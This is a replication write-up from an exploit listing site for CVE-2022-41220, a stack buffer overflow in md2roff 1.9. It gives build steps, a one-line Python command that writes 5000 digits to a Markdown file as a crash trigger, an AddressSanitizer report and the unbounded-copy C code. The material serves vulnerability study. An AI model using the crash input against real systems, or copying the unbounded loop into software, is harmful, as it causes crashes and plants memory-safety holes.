## https://sploitus.com/exploit?id=95FD807D-0A39-5B39-8B81-0A2743804034
# Description of CVE-2022-41220

md2roff 1.9 suffers from a stack-based buffer overflow via a Markdown file containing a large number of consecutive characters to be processed. 


# Replication

To replicate the vulnerability, we must download a vulnerable version of md2roff (version 1.9):

```
git clone https://github.com/nereusx/md2roff.git
cd md2roff
git checkout 
make
```

Once the project is compiled, we can start by creating a malicious Markdown file containing a long run of ASCII digits:

```
python3 -c 'print("1"*5000)' > poc.md
```

Now we can point md2roff to our malicious markdown file and invoke a crash:

```
./md2roff poc.md
```

Executing the previous command will produce a segfault:

```
segmentation fault  ./md2roff poc.md
```

To gain a better understanding of where the overflow is taking place, let's recompile the project with AddressSanitizer (ASan) by adding *-fsanitize=address* to the CFLAGS variable in the Makefile. We also want the compiler to include debug information in the executable (the *-g* flag) so that the sanitizer report can name the line of code that produced the crash:

```
CFLAGS = -std=c99 -fsanitize=address -g
```

Next we will clean any stale files and recompile the project:

```
make clean
make
```

Running `./md2roff poc.md` again with the instrumented binary, the output from ASan shows that the vulnerable source code can be found in *md2roff.c, line 1145*; the frame listing places the 16-byte `num` buffer at offsets [64, 80) and the faulting write at offset 80, the first byte past the end of the array:

```
==195321==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe74125200 at pc 0x556f11052d64 bp 0x7ffe74125000 sp 0x7ffe74124ff8
WRITE of size 1 at 0x7ffe74125200 thread T0
    #0 0x556f11052d63 in md2roff /dev/shm/md2roff/md2roff.c:1145
    #1 0x556f110557cf in main /dev/shm/md2roff/md2roff.c:1464
    #2 0x7f9ad3846189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #3 0x7f9ad3846244 in __libc_start_main_impl ../csu/libc-start.c:381
    #4 0x556f110493a0 in _start (/dev/shm/md2roff/md2roff+0x73a0)

Address 0x7ffe74125200 is located in stack of thread T0 at offset 80 in frame
    #0 0x556f1104cd7e in md2roff /dev/shm/md2roff/md2roff.c:655

  This frame has 6 object(s):
    [32, 40) 'tt' (line 724)
    [64, 80) 'num' (line 1140) <== Memory access at offset 80 overflows this variable
    [96, 352) 'secname' (line 662)
    [416, 672) 'appname' (line 662)
    [736, 992) 'appsec' (line 662)
    [1056, 1312) 'appdate' (line 662)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /dev/shm/md2roff/md2roff.c:1145 in md2roff
Shadow bytes around the buggy address:
  0x10004e81c9f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca30: 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f2 f2 00 00
=>0x10004e81ca40:[f2]f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca60: 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00 00 00
  0x10004e81ca70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca80: 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2
  0x10004e81ca90: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==195321==ABORTING
```

# Vulnerable source code

```
else if ( isdigit(*p) ) { // ordered list
  char num[16], *n;           // fixed 16-byte stack buffer ('num', line 1140 in the ASan frame)
  const char *pstub = p;

  n = num;
  while ( isdigit(*p) )       // no bound on the digit run: every digit past the
    *n ++ = *p ++;            // 15th is written beyond num (md2roff.c line 1145)
  *n = '\0';
```


# References
* https://vulners.com/cve/CVE-2022-41220
* https://owasp.org/www-community/vulnerabilities/Buffer_Overflow